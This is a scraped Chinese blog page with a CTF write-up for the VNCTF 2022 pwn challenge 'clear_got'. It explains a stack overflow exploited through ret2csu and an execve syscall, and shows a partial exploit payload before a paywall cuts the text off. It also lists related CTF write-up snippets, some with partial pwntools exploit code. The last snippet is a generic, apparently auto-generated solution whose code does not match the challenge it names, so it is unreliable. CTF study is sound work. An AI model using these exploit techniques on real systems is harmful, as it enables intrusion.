2022 vnctf pwn clear_got

最新推荐文章于 2025-03-21 09:47:34 发布

原创

最新推荐文章于 2025-03-21 09:47:34 发布 · 1k 阅读

5 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全

本文讲述了如何通过栈溢出漏洞，利用ret2csu技术控制寄存器，清空got表，并通过动态链接的init函数进行间接控制，最终实现控制流程并执行shellcode。重点在于理解寄存器操作和初始化过程的调整以确保程序执行的正确性。

在这里插入图片描述 got表能覆写
没有canary pie

在这里插入图片描述程序的逻辑很简单
一个栈溢出之后将got表全部清空。

在这里插入图片描述

在这里插入图片描述

给了两个系统调用。

那么我们的解题思路。

首先利用ret2csu来控制寄存器

payload = "a"*0x68
payload += p64(0x4007ea) 
payload += p64(0xc01c8) #rbx
payload += p64(0xc01c9) #rbp
payload += p64(0) #r12
payload += p64(59) #rdx
payload += p64(0x601060) #rsi
payload += p64(0) #rdi

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

yongbaoii

关注关注

2
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

VNCTF2022_Pwn_clear_got_WP

weixin_56434818的博客

02-14

1016

VNCTF2022_Pwn_clear_got_WP 文章目录VNCTF2022_Pwn_clear_got_WP检查文件IDA查看题给elf文件利用思路exp 检查文件 RELRO半开，没有canary，开NX，没开PIE。 IDA查看题给elf文件 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[92]; // [rsp+0h] [rbp-60h] BYREF int v5; // [rsp

BUUCTF-PWN题详解（pwn1_sctf_2016 1&jarvisoj_level0 1）

2302_80325559的博客

11-27

2673

今天给大家介绍了几个危险函数strcpy、read，以及Python pwn模块的一些函数用法。这几天也做了这六道溢出的题，思路大差不差，都是先找从哪儿溢出，然后后门的地址。如果大家可以自己独立做出来的话，就可以说只要以后见到这种题，分分钟拿下。后面的题就不会留这么明显的后门给我们了，会让我们自己创建后门，难度会大一点点。我尽量以简洁的语言给大家说清楚，大家一起加油！

参与评论您还未登录，请先登录后发表或查看评论

VNCTF2022 clear_got

u014377094的博客

03-02

445

checksec一下打开ida buf哪里有个明显的栈溢出，shift f12也没发现system和‘binsh’，初步判断是利用LibcSearcher找system的题。下面memset(601008）直接把got表清了，但恰好还剩一个__libc_start_main，左边的end2中可以利用write函数，因此可以利用write函数把 __libc_start_main的真实地址打出来，然后再去找system。但是有一点需要记着，memset got表里的东西也被清了，因此常规那样在ro.

VNCTF PWN

2401_86644999的博客

03-10

387

64位，我们看到读入的buf区域是可读可写可执行的，这就让我们想到了shellcode但是发现读入长度只有22字节，显然是太少了，所以我们考虑到要手搓shellcode二次调用read函数，我们进一步进行gdb调试。而我们需要读入的地址应该是题给的0x11451400可读可写可在执行区域，而在调试中我们发现rax为0，rdi是我们需要的地址数据，所以可以多次运用push和pop的语句节省字节。read函数的三个参数分别是rdi，rsi，rdx。而read的64位系统调用号是0，所以我们的rax应该是0。

*CTF 2022 pwn examination

weixin_46483787的博客

04-17

578

题目主要实现了两个角色，每个角色四五个功能，漏洞点主要有以下几点：当学生的question_number为1，并且pray过一次，老师在给分的时候就会扣十分，由于question_number为1，所以分数会模10，即小于10，减10之后发生负溢出，变成个很大的数。从而可以进入这里的功能：这里可以泄露堆地址，并且可以让一个已知地址指向的值加一然后是这里：这里可以修改一个堆地址的低1字节，从而修改堆块结构，将下一个chunk的size改大，释放后将libc内地址踩进可控堆块，泄露libc。然

VNCTF2023 PWN (traveler & tongxunlu)

maple105890的博客

02-19

1068

坐牢的一天呢

【BUUCTF-PWN】5-pwn1_sctf_2016

燕麦葡萄干的博客

07-04

352

变量s在栈中的位置位0x3c，想要溢出到Rbp需要60+4（因为是32位）=64。fgets()函数只允许输入32位长度，但是I可以变为you，因此可以输入20个I加三个a。这里中间处理的代码还看不太懂，只能看到you、i还有replace字符替换函数。试着运行效果如下，可知代码会把输入的I替换为you。找一下后门函数，函数的位置是0x8048F0D。strcpy()函数存在缓冲区溢出。32位，开启了NX保护。

buuctf pwn1_sctf_2016

最新发布

A_fish_like_sing的博客

03-21

265

buu ctf pwn1_sctf_2016

[*CTF 2022 pwn] examination

weixin_52640415的博客

04-17

673

抽空参加个比赛，水平有限只作了一道题，但还是要记录一下，毕竟好多人还0解呢。学渣的逆袭。英文写的是ret2shool 这个跟ret2XXX的没关系。代码长了读程序就麻烦，慢慢读把函数功能整理如下（叫法随个人理解，英文看单词不认识）：教师菜单增加学生：增加一个学生结构，管理块chunk :0x28含指向成绩单:stud{ptr_s,0,0,0,0} 成绩单chunk:0x18含学生评级，成绩，评价指针，评价长度 s{int idx,int score, ptr_prv,int x,int pr

vnctf pwn签到

yufeiyu66的博客

02-18

217

不知道为啥，我shellcraft生成的后半部分就是用不了，换成手写的就好了。后面的题等我有实力了再复现吧。

NahamCon CTF 2022 pwn 部分writeup

z1r0的博客

05-02

1104

NahamCon CTF 2022 pwn writeup Babiersteps ret2text from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b

[VNCTF2024]-PWN:preinit解析（逆向花指令，绕过strcmp，函数修改，机器码）

2301_79326813的博客

02-29

2944

这边其实看反汇编没啥大作用，需要自己动调。但是前面的绕过strcmp还是要看一下的。

【CTF题解NO.00007】VNCTF2021 - pwn - write up by arttnba3

arttnba3的博客

04-05

1223

【CTF题解NO.00007】VNCTF2021 - pwn - write up by arttnba3[github blog addr there](https://arttnba3.cn/2020/09/08/CTF-0X00-BUUOJ-PWN/)VNCTF2021 - Pwn[VNCTF 2021]White_Give_Flag - read out of bounds[VNCTF 2021]ff - tcache poisoning + IO\_FILE hijackglibc2.32下tca

2022 VNCTF easyROPtocol

weixin_46483787的博客

04-09

1927

一道协议逆向+orwROP的题，基本上难度在于给出符合要求的协议头和校验和拿到题目：在打印的信息中我们可以获取到，这个程序是TCP protocol的C语言实现于是先把TCP的头部结构拿过来：首先进add函数里看看：可以看到能够申请最多4个chunk，每个chunk最多0x1000 生成之后要通过check_head函数和check_sum的检测首先看check_head: 从这里可以得到确定一些头部信息，如源端口和目的端口，还有urgent_ptr必须为0,等，还有一些属性只能缩小范围，

2022DASCTF X SU 三月春季挑战赛-reverse-easyre（复现）

ookami6497的博客

04-03

1024

先用PE查壳，一开始没看清楚，以为没壳，动调了半天，后来才看到是个ASP壳用工具脱壳后分析main函数 int __cdecl main(int argc, const char **argv, const char **envp) { _BYTE v4[50]; // [esp+1Ch] [ebp-74h] BYREF _BYTE v5[50]; // [esp+4Eh] [ebp-42h] BYREF _DWORD v6[3]; // [esp+80h] [ebp-10h] BY.

HackPack CTF 2022 WriteUp

04-09

1152

文章目录pwn-Terminal Overdriveweb-Imported Kimchi 1web-Imported Kimchi 2rev-3T PHON3 HOM3rev-Self-Hosted Cryptorev-Shopkeeper 1rev-Shopkeeper 2rev-Shopkeeper 3 pwn-Terminal Overdrive # -*- coding: utf-8 -*- from pwn import * r = remote('cha.hackpack.club',1099

2022 TQLCTF pwn easyvm

yongbaoii的博客

02-22

717

题目很有意思，肝了不少时间。

[VNCTF 2022]ezmath wp

bestkasscn的博客

02-28

905

[VNCTF 2022]ezmath wp 一个sha256爆破+一个数学问题，可以去百度一下，得到答案就是num * 4,但是查看源码可以发现要提交777次答案，所以只能写脚本来解决，这类交互题一般是去nc服务器，也可以使用python中的第三方库pwntools。 exp from hashlib import sha256 import random from pwn import * import string # 创建由大小写字母和数字组成的字典 dir = string.ascii_lette

2022 MRCTF pwn ezbash

weixin_46483787的博客

04-25

640

昨天打的mrctf上的一道题，大概数了一下有十几个解吧，算是签到题题目给出了一个程序，运行起来之后是一个bash环境，但是里面的文件都是堆上的内存。拿到题目之后首先分析一下文件结构体：这里写的稍微有点问题，其实标志位是前四位，然后file_name的offset为4到20，20到24是这四个字节没有用，是空的，不过懒得改了，凑活着看吧其中标志位标识当前chunk是一个文件还是一个文件夹其他函数具体怎么逆向过程就不说了，好麻烦如果在逆向上卡住的可以给我发私信，我把逆完的i64发你然后看下洞在哪：

pwn1_sctf_2016

02-09

### 关于 PWN1 SCTF 2016 CTF 比赛解题报告 #### 题目概述 PWN1 SCTF 2016 是一次涉及栈溢出漏洞利用的比赛项目。参赛者需理解二进制文件执行流程以及如何通过特定输入控制程序流来实现非授权操作[^2]。 #### 漏洞分析该挑战主要围绕栈缓冲区溢出展开。当应用程序未能正确验证用户输入长度时，攻击者可以构造恶意数据覆盖堆栈上的返回地址或其他重要变量位置。具体到此案例中，存在一处未受保护的函数调用允许外部输入直接写入固定大小的内存区域而没有任何边界检查机制。 #### 利用方法为了成功完成这一关卡，选手们通常采用如下策略： - **寻找合适的gadget链**：由于现代操作系统普遍启用了多种防护措施（如NX位），单纯注入shellcode变得困难重重；因此需要找到一系列ROP gadgets组合起来绕过这些限制。 - **泄露 libc 地址**：考虑到目标机器上可能安装有不同版本的标准C库(libc)，事先获取其基地址有助于后续精确计算所需偏移量。一种常见做法是先触发格式化字符串错误从而读取got表项中的实际映射位置[^4]。 - **构建 payload**：最终形成的载荷不仅要能够跳转至系统命令解释器(`/bin/sh`)所在处启动交互式终端会话，还要巧妙规避各种随机化技术的影响。这往往涉及到精心安排参数传递顺序并调整寄存器状态以匹配期望环境[^1]。 ```python from pwn import * # 假设已知某些关键信息... elf = ELF('vuln_binary') libc = ELF('/path/to/libc.so') # 远程连接或本地调试设置 conn = remote('target_host', port) # 发送初始输入引发泄漏 conn.sendlineafter(b'> ', b'%7$s' + cyclic(8)) leak_data = conn.recvuntil('\n').strip() # 处理泄露出的数据得到libc基址 base_addr = u64(leak_data.ljust(8, b'\x00')) - libc.symbols['puts'] log.info(f"Leaked base address: {hex(base_addr)}") # 构造用于执行/bin/sh的有效负载 payload = flat([ ... # 此处省略具体细节 ]) conn.interactive() ```